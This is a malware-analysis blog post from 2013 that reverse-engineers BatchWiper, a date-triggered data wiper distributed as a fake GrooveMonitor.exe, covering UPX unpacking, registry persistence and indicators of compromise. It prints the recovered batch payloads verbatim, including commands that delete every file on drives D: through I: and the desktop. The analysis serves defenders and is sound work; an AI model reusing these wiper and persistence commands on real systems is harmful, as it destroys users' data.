Reverse engineering

BatchWiper Analysis

January 21, 2013 by Emanuele De Lucia

BatchWiper is a very simplistic computer virus, but potentially very dangerous for the availability of the data contained within logical partitions managed by an infected system. It was discovered fairly recently by Iranian CERT and is programmed to erase data on specific dates. As mentioned above, the code is not very sophisticated in comparison to today’s malware, but is very effective in achieving its purpose. This analysis aims to deepen the activities performed by this malware, and enter in the details of the operations performed throughout its infection.

Preliminary Analysis

The recovered sample was presented as an executable named “GrooveMonitor.exe”. GrooveMonitor.exe is usually the name of a Microsoft utility service associated with Microsoft Office Enterprise 2007. Specifically, Microsoft Office Groove 2007 is a collaboration tool designed to allow several teams to work in a dynamic and effective way. In this case, most likely, this name was chosen by writer to increase the reputation of reliability while it spreads the malicious code. It is a SFX RAR archive file that acts as a dropper for three other files named “juboot.exe”, “jucheck.exe” and “SLEEP.exe”.

The SFX commands given for the extraction of the content have been identified as follows:






A brief explanation of these instructions is given below:

The “Path” command specifies the path in which to extract the contents.

The “Setup” command starts”%systemroot%system32juboot.exe”file.

“Silent = 1” specifies the start of the dialog in a completely hidden mode.

“Overwrite = 2” specifies to not overwrite any existing files.

Once executed then, “GrooveMonitor.exe” extract “juboot.exe”, “jucheck.exe” and “SLEEP.exe” files under “% systemroot% system32 “, and runs independently the file “juboot.exe “.

Unpacking UPX

Preliminary analysis led to the identification of an executable compressed through a well-known tool: UPX. Before starting the detailed analysis, specific targeted operations were carried out then to recover the original executable. The following shows some detailed information about the type, size, compiling information and the MD5 / SHA-1 hash calculation of the“juboot.exe” file.

EP is located at 004110A0

In order to recover the original executable, the analyst sets a BP on the POPAD instruction (opcode 61) and then continues stepping forward until mnemonic JMP located at 00411C39is reached. This JMP lands at 00401000.

Once it has reached this point, the process is dumped and the IAT is rebuilt to make the file fully operational.

EP of unpacked files is located at 00401000.

“juboot.exe” Analysis

The first interesting feature in the analysis is at the 004010CF address, where there is a function used to retrieve the language identifier of the system.Then VerLanguageNameA is called to associate a language string name with the shortly before recovered language identifier. If the system language identified is “deutsch” (German), the following instructions are designed to retrieve what at first view seem to be strings useful with user interaction and error handling in German;otherwise these strings are retrieved in English.

Continuing with the execution, the malware appears to gather information about the operating system.

In our case it has identified a Microsoft Windows XP system through the GetVersionEx function and a series of instructions re-engineered and reported through the following, summarized, pseudo-syntax:

Select CASE .dwMajorVersion


version = “Windows NT 3.5”


version = “Windows NT 4.0”


If .dwMinorVersion == 0 Then

Version = “Windows 2000”

Else If .dwMinorVersion == 1 Then

Version = Windows XP”

Else If .dwMinorVersion == 2 Then

Version = Windows Server 2003 R2″


Version = “Failed retrieving OS”

End If

End Select

After completing these preliminary actions, the malware executes the real workload, beginning to retrieve the path of temporary folder using GetTempPath.

Thena new temporary file is created. The following pseudo-code is reported to better explain the work performed during this time:

dwRetVal = GetTempPath(MAX_PATH,

lpTempPathBuffer); // buffer for path

if (dwRetVal != 0) {

uRetVal =GetTempFileName(lpTempPathBuffer,


0, // unique name


} else {

printf(“GetTempPath Failed”);


User View:

“sub_405EA0” is then reached to delete the temporary file just created.Although at first view the creation and subsequent cancellation of this temp file may seem meaningless, this operation is performed in order to obtain a unique name for the folder that the malware will create shortly.

In fact, we can view the creation of a new directory within the same path with the same name as the temporary file deleted. In our case then, “C:Documents and SettingssoclabImpostazioniLocaliTemp3.tmp” is created.

At 00401A4B, the file “juboot.bat” is generated and placed in this path

The instruction located at 00405F90 provides it to write in its217 bytes through the ‘WriteFile‘ function.

Pointer to the buffer is to be written at 0x3A4CC0, and its content is:

echo off &setlocal

sleep for 2

REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d “%systemroot%system32jucheck.exe” /f

start “” /D”%systemroot%system32″ “jucheck.exe”

The subroutine at 00402771 is responsible for executing the instructions previously copied into juboot.bat.

The malware,at this point, is going to delete “juboot.bat” file and the directory previously created.“juboot.exe” thus ends the workflow.

These set of instructions, therefore, do nothing but add a string value (REG_SZ – %systemroot%system32jucheck.exe)to the registry key “HKCUSoftwareMicrosoftWindowsCurrentVersionRun”to ensure the execution of the malicious code to each system reboot, and then run the file “jucheck.exe”.

“jucheck.exe” Analysis

“jucheck.exe” is very similar to “juboot.exe”. It shares with it almost all of the instructions just shownwith exception of the parameters for creating and writing the “.bat” file in the temporary folder. Also,“jucheck.exe” appeared as a file compressed with UPX, and the same actions as above were taken in order to obtain the original executable.

As already mentioned, even “jucheck.exe” goes to execute its viral payload by creating a .bat file in a temporary directory also previously generated.

The subroutine located at 00405F90 performs the copy of dos instructions into this .bat file. The main difference, compared to the previous instructions performed by “juboot.exe”, is in the amount and in the code itself included.

As we can see, this time 1722 bytes are written into “C:Documents and SettingssoclabImpostazioniLocaliTemp4.tmpjucheck.bat”

The data copied is:

@echo off &setlocal

sleep for 2

del “%systemroot%system32juboot.exe” /q /s /f

del “%userprofile%Start MenuProgramsStartupGrooveMonitor.exe” /q /s /f

if “%date%”==”Mon 12/10/2012” goto yes

if “%date%”==”Tue 12/11/2012” goto yes

if “%date%”==”Wed 12/12/2012” goto yes

if “%date%”==”Mon 01/21/2013” goto yes

if “%date%”==”Tue 01/22/2013” goto yes

if “%date%”==”Wed 01/23/2013” goto yes

if “%date%”==”Mon 05/06/2013” goto yes

if “%date%”==”Tue 05/07/2013” goto yes

if “%date%”==”Wed 05/08/2013” goto yes

if “%date%”==”Mon 07/22/2013” goto yes

if “%date%”==”Tue 07/23/2013” goto yes

if “%date%”==”Wed 07/24/2013” goto yes

if “%date%”==”Mon 11/11/2013” goto yes

if “%date%”==”Tue 11/12/2013” goto yes

if “%date%”==”Wed 11/13/2013” goto yes

if “%date%”==”Mon 02/03/2014” goto yes

if “%date%”==”Tue 02/04/2014” goto yes

if “%date%”==”Wed 02/05/2014” goto yes

if “%date%”==”Mon 05/05/2014” goto yes

if “%date%”==”Tue 05/06/2014” goto yes

if “%date%”==”Wed 05/07/2014” goto yes

if “%date%”==”Mon 08/11/2014” goto yes

if “%date%”==”Tue 08/12/2014” goto yes

if “%date%”==”Wed 08/13/2014” goto yes

if “%date%”==”Mon 02/02/2015” goto yes

if “%date%”==”Tue 02/03/2015” goto yes

if “%date%”==”Wed 02/04/2015” goto yes

goto no


sleep for 3000

IF EXIST d: del “d:*.*” /q /s /f

IF EXIST d: Chkdsk d:

IF EXIST e: del “e:*.*” /q /s /f

IF EXIST e: Chkdsk e:

IF EXIST f: del “f:*.*” /q /s /f

IF EXIST f: Chkdsk f:

IF EXIST g: del “g:*.*” /q /s /f

IF EXIST g: Chkdsk g:

IF EXIST h: del “h:*.*” /q /s /f

IF EXIST h: Chkdsk h:

IF EXIST i: del “i:*.*” /q /s /f

IF EXIST i: Chkdsk i:

del “%userprofile%Desktop*.*” /q /s /f

start calc


At 00402761, the malware ensures the execution of instructions just reported.

After this, the malware goes to delete .bat file at subroutine 00405EA0 and goes to remove the temporary directory.

The malware then comes out through its run cycle and does not remain active. At this stage, the sample analysed has no additional features to highlight. It has a fairly basic code and it’s certainly not very optimized, although it’s functional enough to achieve its goals.

Malware Indicator

The presence of the “jucheck.exe” file under “%systemroot%system32″ may indicate the presence of this malware.

Even the presence of the string value “%systemroot%system32jucheck.exe” under “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” registry key may indicate its presence.


1) Functionality of the malware:

The malware plans to delete any data contained within the logical partitions D:, E:, F:, G:, H:, I:andthe “%userprofile%Desktop”folder in the moment which the system date coincides with those specified in .bat file. At the time that it meets the conditions, it waits for 50 minutes.

2) Local system interaction:

The malware creates and deletes some files and folders within system %temp% directory in order to execute its malicious payload. It copies “juboot.exe”, “jucheck.exe” and “SLEEP.exe” under %systemroot%system32. “juboot.exe” and “GrooveMonitor.exe” are deleted as soon as “jucheck.exe” is executed. The Malware goes to add the string value “%systemroot%system32jucheck.exe” underthe “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” registry key.

3) Other Features:

The malware stops running as soon as it concluded the set of instructions. This means that is launched when the system is restarted. Probably an activation period of three days has been planned by writer to ensure a higher probability of impact.

The malware has sections of code very similar to other malware that I’ve analysed, especially the initial instructions. It goes to perform their workload through the creation and execution of .bat files. Therefore, it can be assumed that the use of some sort of “malware generator tool” was used to originally create it. Alternatively, common starting instructions are being used in this malware. The file “SLEEP.exe” is also not malicious.

4) Propagation Methodology:

The malware does not provide methods of self-propagation. The most likely carriers of infections can be identified in sending massive or targeted spam emails, exploiting browsers vulnerabilities, or through USB spreading.

5) Compiler type:

The malware has been compiled using Microsoft Visual C++.

Posted: January 21, 2013
Emanuele De Lucia
View Profile

Emanuele is a passionate information security professional. He's worked as tier-two security analyst in the Security Operation Center (Se.O.C. or S.O.C.) of one of the largest Italian telecom companies, as well as a code security specialist in one of the world's largest multinational corporations. Currently, he works as an information security manager at one of main facilities of an international organization. With a strong technical background, he specializes in offensive security, reverse engineering, forensic investigations, threats analysis and incident management. He holds a Bachelors degree in Computer Science and a Masters in Computer Security and Forensic Investigations. He also holds the following professional certifications: CISSP, MCSE+Sec, C|EH, E|CSA/L|PT, CIFI, CREA, Security+ and CCNA+Sec.